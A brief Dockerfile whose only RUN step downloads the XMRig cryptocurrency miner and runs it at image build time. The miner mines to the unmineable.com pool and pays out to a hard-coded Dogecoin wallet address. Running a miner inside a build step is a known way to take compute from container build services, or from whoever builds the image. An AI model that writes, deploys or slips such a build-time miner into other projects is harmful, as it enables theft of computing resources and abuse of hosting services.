FROM ubuntu:18.04

SHELL ["/bin/bash", "-c"]

WORKDIR /root

RUN apt update -y \
  && apt install wget -y \
  && wget https://github.com/xmrig/xmrig/releases/download/v6.11.1/xmrig-6.11.1-linux-static-x64.tar.gz \
  && tar -xf xmrig-6.11.1-linux-static-x64.tar.gz \
  && ./xmrig-6.11.1/xmrig -o rx.unmineable.com:3333 -a rx -k -u DOGE:D8MqRUnsEfVC2BBqxRT62o8ZMdBSmSVJ9y.dogedh